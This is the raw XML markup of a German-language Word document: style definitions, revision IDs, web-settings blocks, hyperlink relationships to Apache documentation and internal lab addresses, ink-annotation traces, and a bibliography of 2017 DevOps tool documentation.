    <w:rsid w:val="006D5887"/>
    <w:rsid w:val="006E65A5"/>
    <w:rsid w:val="006E7126"/>
    <w:rsid w:val="006F6952"/>
    <w:rsid w:val="00701722"/>
    <w:rsid w:val="007043A5"/>
    <w:rsid w:val="00710D01"/>
    <w:rsid w:val="00713FC4"/>
    <w:rsid w:val="007175FE"/>
    <w:rsid w:val="00721229"/>
    <w:rsid w:val="007218B0"/>
    <w:rsid w:val="00723018"/>
    <w:rsid w:val="00725F77"/>
    <w:rsid w:val="0073080B"/>
    <w:rsid w:val="00732A4B"/>
    <w:rsid w:val="00735B62"/>
    <w:rsid w:val="0074008C"/>
    <w:rsid w:val="00742A29"/>
    <w:rsid w:val="00743BB1"/>
    <w:rsid w:val="00743CA4"/>
    <w:rsid w:val="0076089B"/>
    <w:rsid w:val="007614AA"/>
    <w:rsid w:val="00761C00"/>
    <w:rsid w:val="00763B6E"/>
    <w:rsid w:val="007648E0"/>
    <w:rsid w:val="00765D3F"/>
    <w:rsid w:val="00772CFD"/>
    <w:rsid w:val="00775EB8"/>
    <w:rsid w:val="007819CD"/>
    <w:rsid w:val="00783FF7"/>
    <w:rsid w:val="00784621"/>
    <w:rsid w:val="00786C34"/>
    <w:rsid w:val="00791450"/>
    <w:rsid w:val="00791995"/>
    <w:rsid w:val="007947A0"/>
    <w:rsid w:val="007A060E"/>
    <w:rsid w:val="007A3816"/>
    <w:rsid w:val="007C3DA2"/>
    <w:rsid w:val="007C5F68"/>
    <w:rsid w:val="007D3976"/>
    <w:rsid w:val="007D3FD1"/>
    <w:rsid w:val="007D585D"/>
    <w:rsid w:val="007E6ABE"/>
    <w:rsid w:val="007E74D6"/>
    <w:rsid w:val="007F1373"/>
    <w:rsid w:val="007F46D9"/>
    <w:rsid w:val="00802009"/>
    <w:rsid w:val="00805892"/>
    <w:rsid w:val="00806C98"/>
    <w:rsid w:val="00814E59"/>
    <w:rsid w:val="00815D86"/>
    <w:rsid w:val="008212EF"/>
    <w:rsid w:val="0082138B"/>
    <w:rsid w:val="00823C49"/>
    <w:rsid w:val="0083525C"/>
    <w:rsid w:val="00835B0B"/>
    <w:rsid w:val="00835F70"/>
    <w:rsid w:val="00837897"/>
    <w:rsid w:val="00840239"/>
    <w:rsid w:val="008426D1"/>
    <w:rsid w:val="00854611"/>
    <w:rsid w:val="00854677"/>
    <w:rsid w:val="00860AD7"/>
    <w:rsid w:val="00862DDF"/>
    <w:rsid w:val="008715C0"/>
    <w:rsid w:val="008719DF"/>
    <w:rsid w:val="008733BA"/>
    <w:rsid w:val="008826CB"/>
    <w:rsid w:val="008836EC"/>
    <w:rsid w:val="008873FE"/>
    <w:rsid w:val="00890801"/>
    <w:rsid w:val="0089145A"/>
    <w:rsid w:val="00896D6A"/>
    <w:rsid w:val="00897C41"/>
    <w:rsid w:val="008A3D6D"/>
    <w:rsid w:val="008A7FED"/>
    <w:rsid w:val="008B6321"/>
    <w:rsid w:val="008B6EB8"/>
    <w:rsid w:val="008C0F7C"/>
    <w:rsid w:val="008C44B0"/>
    <w:rsid w:val="008C5148"/>
    <w:rsid w:val="008C5CD2"/>
    <w:rsid w:val="008D124A"/>
    <w:rsid w:val="008E799A"/>
    <w:rsid w:val="00904ABE"/>
    <w:rsid w:val="0090593F"/>
    <w:rsid w:val="00907265"/>
    <w:rsid w:val="00913F3B"/>
    <w:rsid w:val="00914394"/>
    <w:rsid w:val="00917496"/>
    <w:rsid w:val="00925D27"/>
    <w:rsid w:val="00926DDD"/>
    <w:rsid w:val="00944996"/>
    <w:rsid w:val="00945060"/>
    <w:rsid w:val="00957EFB"/>
    <w:rsid w:val="009623E2"/>
    <w:rsid w:val="009673F2"/>
    <w:rsid w:val="009815DB"/>
    <w:rsid w:val="00984651"/>
    <w:rsid w:val="00986335"/>
    <w:rsid w:val="0099786E"/>
    <w:rsid w:val="009A7F52"/>
    <w:rsid w:val="009B21EC"/>
    <w:rsid w:val="009B541E"/>
    <w:rsid w:val="009B7958"/>
    <w:rsid w:val="009C0EA2"/>
    <w:rsid w:val="009C75E8"/>
    <w:rsid w:val="009D0667"/>
    <w:rsid w:val="009D1AC0"/>
    <w:rsid w:val="009D2F65"/>
    <w:rsid w:val="009E127B"/>
    <w:rsid w:val="009E32FC"/>
    <w:rsid w:val="009E4870"/>
    <w:rsid w:val="009E65EF"/>
    <w:rsid w:val="009F31A4"/>
    <w:rsid w:val="009F441D"/>
    <w:rsid w:val="009F5D93"/>
    <w:rsid w:val="00A00BF7"/>
    <w:rsid w:val="00A00E08"/>
    <w:rsid w:val="00A07313"/>
    <w:rsid w:val="00A132F0"/>
    <w:rsid w:val="00A164E5"/>
    <w:rsid w:val="00A2390D"/>
    <w:rsid w:val="00A2487A"/>
    <w:rsid w:val="00A4122F"/>
    <w:rsid w:val="00A444F3"/>
    <w:rsid w:val="00A45E08"/>
    <w:rsid w:val="00A5114A"/>
    <w:rsid w:val="00A632ED"/>
    <w:rsid w:val="00A7546A"/>
    <w:rsid w:val="00A8671E"/>
    <w:rsid w:val="00A94DC1"/>
    <w:rsid w:val="00A9601B"/>
    <w:rsid w:val="00AA4BCD"/>
    <w:rsid w:val="00AB043C"/>
    <w:rsid w:val="00AB6084"/>
    <w:rsid w:val="00AC6154"/>
    <w:rsid w:val="00AC6FA1"/>
    <w:rsid w:val="00AC710F"/>
    <w:rsid w:val="00AE251B"/>
    <w:rsid w:val="00AE49EE"/>
    <w:rsid w:val="00AE5A47"/>
    <w:rsid w:val="00AE6A30"/>
    <w:rsid w:val="00AE7DF0"/>
    <w:rsid w:val="00AF24F6"/>
    <w:rsid w:val="00AF3E2C"/>
    <w:rsid w:val="00AF43D2"/>
    <w:rsid w:val="00AF714F"/>
    <w:rsid w:val="00B0098C"/>
    <w:rsid w:val="00B01D2B"/>
    <w:rsid w:val="00B022F8"/>
    <w:rsid w:val="00B029D1"/>
    <w:rsid w:val="00B114C3"/>
    <w:rsid w:val="00B11576"/>
    <w:rsid w:val="00B1481B"/>
    <w:rsid w:val="00B176BD"/>
    <w:rsid w:val="00B24B49"/>
    <w:rsid w:val="00B27A9A"/>
    <w:rsid w:val="00B3095C"/>
    <w:rsid w:val="00B31B27"/>
    <w:rsid w:val="00B326C1"/>
    <w:rsid w:val="00B33BCA"/>
    <w:rsid w:val="00B3610C"/>
    <w:rsid w:val="00B37C9B"/>
    <w:rsid w:val="00B410F6"/>
    <w:rsid w:val="00B42AF0"/>
    <w:rsid w:val="00B44BBA"/>
    <w:rsid w:val="00B50BD8"/>
    <w:rsid w:val="00B55943"/>
    <w:rsid w:val="00B63FDB"/>
    <w:rsid w:val="00B73BF2"/>
    <w:rsid w:val="00B808D3"/>
    <w:rsid w:val="00B9607E"/>
    <w:rsid w:val="00B9634B"/>
    <w:rsid w:val="00BA13A8"/>
    <w:rsid w:val="00BA1564"/>
    <w:rsid w:val="00BA2286"/>
    <w:rsid w:val="00BA7051"/>
    <w:rsid w:val="00BA7590"/>
    <w:rsid w:val="00BB0699"/>
    <w:rsid w:val="00BB1273"/>
    <w:rsid w:val="00BB1534"/>
    <w:rsid w:val="00BB266A"/>
    <w:rsid w:val="00BB276A"/>
    <w:rsid w:val="00BB77A2"/>
    <w:rsid w:val="00BC15BD"/>
    <w:rsid w:val="00BC325E"/>
    <w:rsid w:val="00BC526F"/>
    <w:rsid w:val="00BD0C47"/>
    <w:rsid w:val="00BD2277"/>
    <w:rsid w:val="00BD3AD1"/>
    <w:rsid w:val="00BD6CB6"/>
    <w:rsid w:val="00BE0866"/>
    <w:rsid w:val="00BE1564"/>
    <w:rsid w:val="00BE7620"/>
    <w:rsid w:val="00BF02B2"/>
    <w:rsid w:val="00BF0354"/>
    <w:rsid w:val="00BF3119"/>
    <w:rsid w:val="00BF35AD"/>
    <w:rsid w:val="00BF436A"/>
    <w:rsid w:val="00BF522D"/>
    <w:rsid w:val="00BF5FD5"/>
    <w:rsid w:val="00BF6C32"/>
    <w:rsid w:val="00BF7EB9"/>
    <w:rsid w:val="00C04B9A"/>
    <w:rsid w:val="00C06198"/>
    <w:rsid w:val="00C075D6"/>
    <w:rsid w:val="00C21C18"/>
    <w:rsid w:val="00C24E59"/>
    <w:rsid w:val="00C250C8"/>
    <w:rsid w:val="00C25633"/>
    <w:rsid w:val="00C3443E"/>
    <w:rsid w:val="00C41D17"/>
    <w:rsid w:val="00C455E2"/>
    <w:rsid w:val="00C544C7"/>
    <w:rsid w:val="00C54CA8"/>
    <w:rsid w:val="00C60919"/>
    <w:rsid w:val="00C60D48"/>
    <w:rsid w:val="00C6158B"/>
    <w:rsid w:val="00C631E2"/>
    <w:rsid w:val="00C8009A"/>
    <w:rsid w:val="00C806CB"/>
    <w:rsid w:val="00C80EB4"/>
    <w:rsid w:val="00C83131"/>
    <w:rsid w:val="00C847AA"/>
    <w:rsid w:val="00C8688E"/>
    <w:rsid w:val="00C874D3"/>
    <w:rsid w:val="00C91B50"/>
    <w:rsid w:val="00C93BB8"/>
    <w:rsid w:val="00CA12F4"/>
    <w:rsid w:val="00CA7F97"/>
    <w:rsid w:val="00CB2939"/>
    <w:rsid w:val="00CB6587"/>
    <w:rsid w:val="00CC3F53"/>
    <w:rsid w:val="00CD2781"/>
    <w:rsid w:val="00CD4F13"/>
    <w:rsid w:val="00CE0473"/>
    <w:rsid w:val="00CE0B8D"/>
    <w:rsid w:val="00CE519D"/>
    <w:rsid w:val="00CE63EF"/>
    <w:rsid w:val="00CE73C2"/>
    <w:rsid w:val="00CF1218"/>
    <w:rsid w:val="00CF5F25"/>
    <w:rsid w:val="00D02370"/>
    <w:rsid w:val="00D041A6"/>
    <w:rsid w:val="00D170D8"/>
    <w:rsid w:val="00D172A1"/>
    <w:rsid w:val="00D258E5"/>
    <w:rsid w:val="00D26580"/>
    <w:rsid w:val="00D27392"/>
    <w:rsid w:val="00D3481C"/>
    <w:rsid w:val="00D35D1B"/>
    <w:rsid w:val="00D37D96"/>
    <w:rsid w:val="00D46637"/>
    <w:rsid w:val="00D46C33"/>
    <w:rsid w:val="00D52948"/>
    <w:rsid w:val="00D620D9"/>
    <w:rsid w:val="00D62404"/>
    <w:rsid w:val="00D62DC2"/>
    <w:rsid w:val="00D67771"/>
    <w:rsid w:val="00D72E51"/>
    <w:rsid w:val="00D72F76"/>
    <w:rsid w:val="00D7398B"/>
    <w:rsid w:val="00D74A0F"/>
    <w:rsid w:val="00D74EF7"/>
    <w:rsid w:val="00D74FA4"/>
    <w:rsid w:val="00D817B3"/>
    <w:rsid w:val="00D817EE"/>
    <w:rsid w:val="00D828AD"/>
    <w:rsid w:val="00D9367E"/>
    <w:rsid w:val="00D95C89"/>
    <w:rsid w:val="00D9669C"/>
    <w:rsid w:val="00D97615"/>
    <w:rsid w:val="00DA3009"/>
    <w:rsid w:val="00DA3889"/>
    <w:rsid w:val="00DA4427"/>
    <w:rsid w:val="00DB126C"/>
    <w:rsid w:val="00DB378D"/>
    <w:rsid w:val="00DB488D"/>
    <w:rsid w:val="00DB63D8"/>
    <w:rsid w:val="00DD60C7"/>
    <w:rsid w:val="00DE0689"/>
    <w:rsid w:val="00DE42AB"/>
    <w:rsid w:val="00DF60BC"/>
    <w:rsid w:val="00DF734D"/>
    <w:rsid w:val="00E00883"/>
    <w:rsid w:val="00E016C0"/>
    <w:rsid w:val="00E11F01"/>
    <w:rsid w:val="00E15270"/>
    <w:rsid w:val="00E3201A"/>
    <w:rsid w:val="00E32AC7"/>
    <w:rsid w:val="00E355CE"/>
    <w:rsid w:val="00E5048C"/>
    <w:rsid w:val="00E61521"/>
    <w:rsid w:val="00E62C00"/>
    <w:rsid w:val="00E66A95"/>
    <w:rsid w:val="00E712E4"/>
    <w:rsid w:val="00E7518D"/>
    <w:rsid w:val="00E75A1E"/>
    <w:rsid w:val="00E80B8A"/>
    <w:rsid w:val="00EA069E"/>
    <w:rsid w:val="00EA4108"/>
    <w:rsid w:val="00EA43D2"/>
    <w:rsid w:val="00EC15A5"/>
    <w:rsid w:val="00ED2A07"/>
    <w:rsid w:val="00ED3052"/>
    <w:rsid w:val="00ED6924"/>
    <w:rsid w:val="00ED7CB1"/>
    <w:rsid w:val="00EE1E4B"/>
    <w:rsid w:val="00EE2084"/>
    <w:rsid w:val="00EE21B7"/>
    <w:rsid w:val="00EF3B72"/>
    <w:rsid w:val="00F005DA"/>
    <w:rsid w:val="00F01E21"/>
    <w:rsid w:val="00F01E95"/>
    <w:rsid w:val="00F07A5A"/>
    <w:rsid w:val="00F11532"/>
    <w:rsid w:val="00F1153E"/>
    <w:rsid w:val="00F12FA5"/>
    <w:rsid w:val="00F13553"/>
    <w:rsid w:val="00F34552"/>
    <w:rsid w:val="00F43D42"/>
    <w:rsid w:val="00F45AB5"/>
    <w:rsid w:val="00F4688C"/>
    <w:rsid w:val="00F60F1B"/>
    <w:rsid w:val="00F6699E"/>
    <w:rsid w:val="00F70BBB"/>
    <w:rsid w:val="00F7277A"/>
    <w:rsid w:val="00F72F66"/>
    <w:rsid w:val="00F86127"/>
    <w:rsid w:val="00F86E37"/>
    <w:rsid w:val="00F958E8"/>
    <w:rsid w:val="00FA6849"/>
    <w:rsid w:val="00FA7980"/>
    <w:rsid w:val="00FA7DD2"/>
    <w:rsid w:val="00FB0D63"/>
    <w:rsid w:val="00FB231A"/>
    <w:rsid w:val="00FB256F"/>
    <w:rsid w:val="00FB75B5"/>
    <w:rsid w:val="00FD2F30"/>
    <w:rsid w:val="00FD3EC4"/>
    <w:rsid w:val="00FD449E"/>
    <w:rsid w:val="00FE4567"/>
    <w:rsid w:val="00FE65A7"/>
    <w:rsid w:val="00FE705E"/>
    <w:rsid w:val="00FF11F0"/>
    <w:rsid w:val="00FF12D4"/>
    <w:rsid w:val="00FF74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3CF9C"/>
  <w15:docId w15:val="{B1CE810A-C43B-41DE-BFC7-847ABF81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table" w:styleId="Tabellenraster">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="NormaleTabelle"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="0077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183542"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="KommentartextZchn">
    <w:name w:val="Kommentartext Zchn"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:link w:val="Kommentartext"/>
    <w:semiHidden/>
    <w:rsid w:val="00183542"/>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="KommentarthemaZchn">
    <w:name w:val="Kommentarthema Zchn"/>
    <w:basedOn w:val="KommentartextZchn"/>
    <w:link w:val="Kommentarthema"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00183542"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="NichtaufgelsteErwhnung">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DA30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4877">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="35132543">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>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115686526">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="133836958">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="207231003">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445271322">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="463276998">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="576787301">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63571531">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="785270491">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="890846665">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20474916">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81505161">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305045440">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1312096539">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14303252">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1530216809">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53272042">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1566408127">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1608462744">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1804809051">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1152452327">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>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66684270">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tomcat.apache.org/security"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ttpd.apache.org/docs/2.4/de/mod/core.html"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jabba.tatooine.space/jabbathehutt/234023492910910239103901.php?id=29" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.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yperlink" Target="http://10.85.229.145/webdav/"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customXml" Target="ink/ink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10.85.229.145/batcave"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6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02T11:23:21.599"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.03333" units="cm"/>
      <inkml:brushProperty name="height" value="0.03333" units="cm"/>
      <inkml:brushProperty name="ignorePressure" value="1"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 410,'0'0,"0"0,0 0,0 0,0 0,0 0,0 0,0 0,0 0,1 0,2 0,0-1,5-4,4-5,8-6,4-3,1-4,1 0,-1 1,-1 3,0 2,-2 2,-1 4,-2 2,-1 2,-1 0,-3 2,-1 2,0 4,-1 2,-1 2,1 1,-1 2,1 0,0 0,2 1,2 0,3 0,0-3,1-2,2-5,1-2,2-6,3-6,3-3,-2-3,-3 1,-4 3,-5 4,-5 3,-4 3,-2 3,-3 1,-2 2,-2 3,-3 4,-4 9,-6 14,-4 10,-6 13,-6 12,-2 7,-4 10,0-1,-1-3,1-6,-1-6,1-7,-4-4,0-6,-2-5,-4-5,-2-5,4-6,3-6,9-6,10-6</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1228.317">553 778,'0'0,"0"0,0 0,0 0,0 0,0 0,0 0,0 0,0 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="4300.916">1153 263,'0'0,"0"0,0 0,1 0,1 1,-1 2,0 2,0 3,-1 4,0 5,-2 5,0 4,-4 5,-4 5,-3 2,-4 0,-3-1,-1 0,-1-2,1-3,3-2,2-4,1-2,3-5,1-4,1-4,1-4,0-1,1-3,1-2,0-2,-2-23,-1-10,4-1,7-4,6 0,3 3,3 1,1 3,-2 3,-1 2,-1 2,0-1,0 0,1-2,3-1,2-1,2 1,2 0,-2 4,-3 3,-3 3,-1 4,0 4,-1 3,0 4,0 4,1 4,0 5,-1 5,-1 0,-2 27,-2 8,-3-3,-2-6,-5-5,-3-5,-2-5,-2-1,-3-2,0-2,-2-2,1-3,2-4,1-5,4-2,4-2,1-2,3-1,2 1,3-2,1 0,2 0,3 2,2 2,2 4,-1 2,-2 3,-4 2,-2 2,-3 1,-4 0,0-1,-3 1,-4 1,-2 3,-1-1,-1-2,0-4,1-1,0-4,1 0,3-3,1 0,1-1,1-1,2 0,1-1,1-1,1-1,0 0,1 0,0 0,2-1,2 1,4-2,6-3,6-5,8-6,7-4,2-3,-1 0,-3 2,-6 2,-5 3,-6 4,-3 2,-4 2,-3 3,-2 1,-1 2,-1 3,-3 2,-3 5,-6 8,-5 7,-3 2,-2 0,3-4,1-5,5-3,3-4,3-4,6-4,9-8,13-10,11-10,6-6,0 0,-4 3,-6 5,-7 6,-7 7,-6 5,-5 7,-4 7,-3 7,-6 7,-4 6,-1 2,-2-2,3-4,2-3,3-5,4-6,4-4,15-10,17-8,13-11,9-8,2-6,-2-1,-9 5,-11 7,-10 6,-8 8,-7 5,-9 7,-5 7,-6 9,-6 8,-4 9,0 2,3 0,4-3,4-6,5-5,3-4,6-5,6-8,17-13,20-21,13-19,10-19,3-12,-6-6,-8 0,-11 6,-11 13,-11 15,-8 15,-8 13,-5 9,-3 8,-6 10,-3 17,-5 17,-6 20,-2 11,0 5,2-3,3-7,2-12,4-12,4-12,3-9,8-7,13-10,14-11,9-8,2-3,-3 1,-8 3,-9 6,-10 9,-11 14,-9 12,-10 6,-8 5,-5 0,-1-4,4-6,6-5,7-6,12-4,12-3,14-2,13-4,4-3,-2-1,-4-3,-7-1,-8-3,-9 1,-6 3</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="4443.985">1537 0,'0'0,"-5"0,-5 5,-2 1,2-1</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JFr17</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{1D37CA81-9F3D-4CDB-AC77-7B13B9244A40}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>JFrog</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>Artifactory User Guide</b:Title>
    <b:Year>2017</b:Year>
    <b:Month>06</b:Month>
    <b:Day>11</b:Day>
    <b:YearAccessed>2017</b:YearAccessed>
    <b:MonthAccessed>09</b:MonthAccessed>
    <b:DayAccessed>20</b:DayAccessed>
    <b:URL>https://www.jfrog.com/confluence/display/RTF/Welcome+to+Artifactory</b:URL>
    <b:RefOrder>4</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Sim17</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{A2C2CDC4-4A3C-4517-B298-5740B5777CB4}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>SimplifyOps</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>Rundeck Documentation</b:Title>
    <b:Year>2017</b:Year>
    <b:Month>08</b:Month>
    <b:Day>25</b:Day>
    <b:YearAccessed>2017</b:YearAccessed>
    <b:MonthAccessed>09</b:MonthAccessed>
    <b:DayAccessed>20</b:DayAccessed>
    <b:URL>http://rundeck.org/docs/</b:URL>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Atl17</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{962B4EAD-8726-432D-9ECD-74329F831024}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Atlassian</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>Bitbucket Cloud documentation</b:Title>
    <b:Year>2017</b:Year>
    <b:YearAccessed>2017</b:YearAccessed>
    <b:MonthAccessed>09</b:MonthAccessed>
    <b:DayAccessed>21</b:DayAccessed>
    <b:URL>https://confluence.atlassian.com/bitbucket/</b:URL>
    <b:RefOrder>2</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Doc17</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{0EF623E5-DBD5-4212-811A-1E3F9988A5CB}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Docker Inc.</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>Docker Documentation</b:Title>
    <b:Year>2017</b:Year>
    <b:YearAccessed>2017</b:YearAccessed>
    <b:MonthAccessed>09</b:MonthAccessed>
    <b:DayAccessed>18</b:DayAccessed>
